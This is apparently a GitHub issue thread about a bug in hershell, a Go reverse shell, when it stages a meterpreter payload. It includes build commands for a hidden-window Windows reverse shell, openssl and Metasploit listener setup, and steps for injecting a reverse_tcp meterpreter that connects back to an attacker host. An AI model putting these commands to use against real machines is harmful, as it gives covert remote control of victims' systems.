run meterpreter failed about hershell HOT 7 CLOSED

Hi @b1tg ,
Thanks for the report, I'll look into it this week.

Please note that this feature is a bit buggy currently, and I am working on a way to improve it.

from hershell.

Ok so I see what's going on here, and you might have misunderstood something along the way.

You need two payload handlers:

• one for hershell to connect back
• one for your meterpreter payload to connect back

The one I gave as an example in the README is the one needed for hershell.

You need to start another one for your meterpreter session. Currently, I'm only supporting the following payloads for the meterpreter staging:

• windows/meterpreter/reverse_tcp : the X86 reverse TCP meterpreter for Windows
• windows/x64/meterpreter/reverse_tcp : the X86_64 TCP merterpreter for Windows

I've implemented the reverse_http and reverse_https, but it needs more testing before being pushed on master.

So, to sum it up, what you need is:

1. Start a listener for hershell (ncat, openssl, msfconsole, etc.)
2. Get your hershell session
3. Start a payload handler (using exploit/multi/handler) for the following payload : windows/x64/meterpreter/reverse_tcp
4. Run meterpreter KALI_IP:PORT in hershell
5. Hopefully, enjoy your new injected meterpreter

The current README might be confusing, so I think I will add some examples, and clean it a bit so there will be no more confusions in the future.

Let me now if it still does not work after trying this.

And anyway, thanks for your interest on this project.

from hershell.

i tried this again, still can't work, hershell exited after run "meterpreter ip:port" , and meterpreter session didn't created

msf exploit(handler) > jobs

Jobs
====

  Id  Name                    Payload                              Payload opts
  --  ----                    -------                              ------------
  2   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.123.47:1235

msf exploit(handler) >
[*] Sending stage (205379 bytes) to 192.168.123.47
[*]  - Meterpreter session 4 closed.  Reason: Died
[*] Meterpreter session 4 opened (127.0.0.1 -> 127.0.0.1) at 2018-01-22 13:33:04 +0800

msf exploit(handler) > sessions

Active sessions
===============

No active sessions.

msf exploit(handler) >

ss@kali:~/Desktop/tools/hershell$ make windows64 LHOST=192.168.123.47 LPORT=1234
GOOS=windows GOARCH=amd64 go build --ldflags "-X main.connectString=192.168.123.47:1234 -X main.fingerPrint=$(openssl x509 -fingerprint -sha256 -noout
-in server.pem | cut -d '=' -f2) -H=windowsgui" -o hershell.exe hershell.go

ss@kali:~/Desktop/tools/hershell$ ls
hershell.exe  hershell.go  Makefile  README.md  server.key  server.pem  shell

ss@kali:~/Desktop/tools/hershell$ openssl s_server -cert server.pem -key server.key -accept 1234
Using default temp DH parameters
ACCEPT
-----BEGIN SSL SESSION PARAMETERS-----
MHUCAQECAgMDBALALwQgsxNQxfJJJdMvrhFAhJTvJLwpKgmKPoJCgX+fdym91b4E
MKdz81UgLJ0ThllSWD3rG/hJfPsXCB1etszAKPpzjPnXUFYhJTc97PiFOGk5vJjj
KaEGAgRaZXc7ogQCAhwgpAYEBAEAAAA=
-----END SSL SESSION PARAMETERS-----
Shared ciphers:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA:AES256-SHA
Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Shared Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Supported Elliptic Curve Point Formats: uncompressed
Supported Elliptic Curves: X25519:P-256:P-384:P-521
Shared Elliptic curves: X25519:P-256:P-384:P-521
CIPHER is ECDHE-RSA-AES128-GCM-SHA256
Secure Renegotiation IS supported
[hershell]> meterpreter 192.168.123.47:1235
[hershell]> ERROR
shutting down SSL
CONNECTION CLOSED
ACCEPT

from hershell.

Thanks for the update, I'll look into it.

As I said earlier, this feature is still a bit buggy, and needs improvements.

I'll leave this issue open until the meterpreter injection works reliably.

I had some similar issues with Windows Server 2008 R2 recently: I had to retry several times to get the reverse TCP payload to work, whereas it worked like a charm on Windows 10 machine.

Anyway, I'll look into it.

from hershell.

The issue should be fixed in 3ceef30, pushed in master.

There was indeed a problem while fetching the stage2 from the metasploit TCP handler.

Could you please get the latest version and test again ?

I have no problem on Windows 10 x64 with this update.

from hershell.

i just test again, problem fixed in the latest version,
nicely done! @lesnuages

from hershell.

Great, let's close this one :)

from hershell.